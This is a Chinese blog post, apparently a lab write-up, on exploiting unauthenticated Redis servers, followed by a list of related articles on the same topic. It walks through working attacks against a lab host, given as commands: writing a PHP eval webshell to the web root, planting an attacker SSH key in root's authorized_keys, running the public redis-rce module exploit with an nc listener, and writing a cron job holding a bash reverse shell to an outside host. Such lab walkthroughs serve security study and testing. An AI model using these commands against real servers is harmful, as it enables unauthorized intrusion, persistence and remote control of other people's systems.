Redis未授权访问漏洞总结

最新推荐文章于 2024-09-09 15:19:39 发布
置顶 最新推荐文章于 2024-09-09 15:19:39 发布
阅读量900 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WWL0814/article/details/112231003
版权

Redis未授权访问漏洞总结

前言

在安装redis的时候建议采用wget方式安装,本人通过apt安装的时候,在设置完各种东西,save的时候总报错,为此折腾了一上午。

redis安装

ubuntu安装redis

 apt-get install gcc && make
 wget http://download.redis.io/releases/redis-4.0.9.tar.gz
 tar -zxvf  redis-4.0.9.tar.gz
 cd redis-4.0.9
 make

123
在这里插入图片描述
编译之后,进入src目录,将redis-server和redis-cli拷贝到/usr/bin目录下

 cd src/
 cp redis-server /usr/bin
 cp redis-cli /usr/bin
 cd ../
 ls
 cp redis.conf /etc/

编辑/etc/redis.conf文件

 将 bind 127.0.0.1 修改为bind 0.0.0.0;允许任意主机连接
 将 protected-mode yes 改为no;关闭远程连接保护
 将daemonize no 改为yes;允许后台运行

运行redis服务

redis-server  /etc/redis.conf

查看redis是否运行

ps -aux | grep 6379

在这里插入图片描述

windows下载redis客户端

下载地址:https://github.com/microsoftarchive/redis/releases
在这里插入图片描述
解压Redis-x64-3.2.100.zip,进入目录,按住shift,右击空白处,选择打开powershell窗口
在这里插入图片描述
运行redis-cli.exe,连接192.168.1.115的redis

.\redis-cli.exe -h 192.168.1.115

在这里插入图片描述

未授权访问-webshell写入

前提条件:知道网站的绝对路径。
任意文件写入的时候,服务器必须拥有该目录,否则会报错,提示:(error) ERR Changing directory: No such file or directory

命令

config set dir /var/www/html     设置web目录
config set dbfilename webshell.php  设置备份文件名
set shell "<?php @eval($_POST['shell']);?>"  设置值
save  保存

在这里插入图片描述
进入到ubuntu /var/www/html目录中,查看文件是否写入
在这里插入图片描述

ssh免密码登录

kali为攻击机
ubuntu为受害机
windows连接ubuntu redis数据库

在kali中执行下面命令,生成密钥,不用输入任何东西,一直回车,直到密钥生成

ssh-keygen -t rsa

在这里插入图片描述

进入到/root/.ssh/目录,查看id_rsa.pub文件,并复制内容
在这里插入图片描述
进入到ubuntu中,输入命令ssh-keygen,也是一直回车,直到密钥生成,会自动在/root/.ssh/目录中生成id_rsa id_rsa.pub俩个文件,默认是不存在.ssh目录的。
在这里插入图片描述
在windows redis-cli.exe中执行以下命令,set x 的内容为kali中id_rsa.pub的值

config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC4pxdRRXwD8A+7WlfB4plgmlrMjvLlrPXrW6kmm03Nlnifk/Pvi76gu2/enOLiHmIG8g8AFhv8G436KZy91c3K/Kag2fpNXBK3Nv981PEFE0yqNoGENMSyef9sRhX1KDzgRvSHH2BRF6WBW/G1r9ZlXcMuIyciBsOva7f1eUXVvd20o5Lk4oMFFbD+ELzhdgjYBL0aeOu9uLfKoRtgxPAhYC2JRPtp/CPkzCbMxW54vUWyoWi9i4raaUOsFriu/V6f51Pzs+6hvsy+cExwJvseqsFGHXHy3b10MbTxhlsTAxyCQ53CVV7PVyh1oCcuOOZYfOVLXbxZsXJmBV4w0fX3wAUZshrfzbEmKt04cU05ZS453pjL2h/l+Kpt11zHN8B/0vwhTv8w8pzKV5ZrZU+vn6zuV36RBcRT35xHWcuB6QvYYX1nzP8DE3FBjSftJi+ifRZSBf8rp9iJ9VbIyV0aXaUKZMPDNsURsmqE1yJy+OH+vzoddU3TlSbksg6dj28= root@kali\n\n\n"
save

在这里插入图片描述

在kali中执行下面命令,输入yes,成功连接到目标主机

ssh -i id_rsa root@192.168.1.115

在这里插入图片描述

redis 4.0~5.0 rce漏洞

在kali中下载exp

git clone https://github.com/Ridter/redis-rce.git
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git

在这里插入图片描述
编译so文件

cd RedisModules-ExecuteCommand/
ls 
make

在这里插入图片描述
复制module.so到redis-rce目录下

cp module.so /var/local/redis-rce/

在这里插入图片描述
在kali中使用nc监听本地的1234端口

nc -lnvp 1234

在这里插入图片描述
运行下面命令

cd redis-rce/

python3 redis-rce.py -r 192.168.1.115  -L 192.168.1.110 -f module.so

在这里插入图片描述
在这里插入图片描述

bash反弹

在windows中redis-cli中执行

.\redis-cli.exe -h 192.168.1.115
set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.110/6666 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

在这里插入图片描述
在kali中使用nc进行监听

nc -lnvp 6666

这里反弹shell失败了,原因是ubuntu下无法反弹,条件是centos反弹
这是由于redis向任务计划文件里写内容出现乱码而导致的语法错误,而乱码是避免不了的,centos会忽略乱码去执行格式正确的任务计划,而ubuntu并不会忽略这些乱码,所以导致命令执行失败

msf下利用模块

auxiliary/scanner/redis/file_upload    normal     Redis File Upload
auxiliary/scanner/redis/redis_login    normal     Redis Login Utility
auxiliary/scanner/redis/redis_server   normal     Redis Command Execute Scanner

参考资料

redis漏洞利用
Redis未授权访问漏洞复现的(三种方式)

Corl7
关注
Redis授权访问漏洞
m0_61506558的博客
09-10 909
VNC是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件,由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于UNXI和Linux的免费开源软件,由VNC Server和VNC View两部分组成。VNC默认端口号为5900、5901。VNC授权访问漏洞如果被利用可能造成恶意用户直接控制target主机。
9-5 redis授权访问漏洞
weixin_43263566的博客
11-17 540
攻击者可以成功将自己的SSH公钥写入目标服务器的/root/.ssh文件夹中的authorized_keys文件,从而可以使用相应私钥直接登录目标服务器。在Redis 4.x/5.x以前的版本中,授权访问还可以利用master/slave模式加载远程模块,并通过动态链接库的方式执行任意命令。配置公钥认证:攻击者将公钥配置到Redis服务器上,可能是通过利用已经获得的其他权限,或者通过攻击Redis服务器的漏洞进行授权访问并添加公钥。高版本的Redis通常会修复已知的漏洞,并提供更强大的安全性能。
Redis授权访问漏洞复现
马赛克的博客
04-10 1万+
一:漏洞简介和危害 Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上; 如果没有设置密码认证(一般为空)的情况下,会导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。 攻击者访问之后,利用Redis自身提供的config命令,可以进行写文件操作 可以成功把...
redis授权漏洞利用总结
最新发布
Echo__h的博客
09-09 950
redis默认端口6379,在默认配置情况下密码为空,因此如果将redis暴露到公网,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据,并且可以利用redis写入shell、写入SSH公钥等危险操作。
redis 4.x及以上的授权访问
weixin_30663471的博客
08-07 90
选择在kali中复现 选择了redis5.0.5版本 一.下载并安装: $ wget http://download.redis.io/releases/redis-5.0.5.tar.gz $ tar xzf redis-5.0.5.tar.gz $ cd redis-5.0.5 $ make 2.将redis-5.0.5.tar.gz里面的redis.conf...
redis4.0x5.0x-远程命令漏洞利用exp.rar
07-09
redis4.0x5.0x-远程命令漏洞利用exp 2019年7月9日版,仅用来学习测试,不可用于非法用途,谢谢配合,实测可用
漏洞复现】---- Redis 4.x/5.x 授权访问漏洞
qq_43168364的博客
12-24 1304
一、简介 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库。Redis提供了多种语言的API。Redis默认使用6379端口 Redis授权漏洞产生的原因 ---- Redis默认使用6379端口,并且Redis默认是空密码并且默认允许远程连接。一些管理员在安装好Redis之后,并没有修改它的默认端口。而且也没有设置密码的话,黑客就可以通过Redis数据库写入任意文件进行提权,从而操控该服务器。 Redis授权访问在4.x/5.0.5以前
Redis授权访问漏洞搭建复现
m0_58595840的博客
01-05 2856
Redis授权访问漏洞利用方式总结(含靶场搭建)
渗透测试-Redis授权访问漏洞利用
cdyunaq的博客
12-24 1202
危害 信息泄露 系统信息 redis保存的信息 写文件GetShell 在Web目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击机
Redis授权漏洞复现及利用(window,linux)
热门推荐
dreamthe的博客
03-22 2万+
1.了解redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有
Redis漏洞总结
weixin_42345596的博客
09-19 3064
Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新
Redis数据库漏洞授权访问
weixin_64659753的博客
05-26 567
Redis数据库漏洞授权访问
redis安装和使用,解决漏洞CVE-2022-24735,CVE-2022-24736
大宇进阶之路的博客
06-20 4046
Redis目前版本6.2.6,升级redis7解决CVE-2022-24735 CVE-2022-24736 两个漏洞在同一台服务器中升级redis redis安装包官网下载地址:Download | Redis注意:redis 偶数为稳定版本,奇数为开发版本。安装包上传到linux服务器后,解压缩:redis的安装位置我选择/usr/local/redistar -zxvf redis-7.0.2.tar.gz更名移动解压后的目录文档mv redis-7.0.2 /usr/local/redis停止目前
漏洞复现---Redis 远程命令执行漏洞复现
dust_hk的博客
07-10 6938
0x00 Redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型...
redis 4.0.9 master slave + sentinel 实战测试
weixin_33797791的博客
06-04 185
为什么80%的码农都做不了架构师?>>> ...
浅谈redis授权漏洞
2401_84466361的博客
05-24 1063
版本比较高的redis需要修改redis的配置文件,将bind前面#注释符去掉,将protected-mode 后面改为no。
Redis漏洞利用总结
weixin_46356409的博客
01-22 1874
redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis默认使用 6379 端口。
常见授权访问漏洞总结
sc_Pease的博客
12-25 2648
本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 常见的授权访问漏洞Redis 授权访问漏洞 MongoDB 授权访问漏洞 Jenkins 授权访问漏洞 Memcached 授权访问漏洞 JBOSS 授权访问漏洞 VNC 授权访问漏洞 Docker 授权访问漏洞 ZooKeeper 授权访问漏洞 Rsync 授权访问漏洞 Atlassian Crowd 授权访问漏洞 CouchDB 授权访问漏洞 Elasticsearch 授权访问漏洞 Hadoop
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值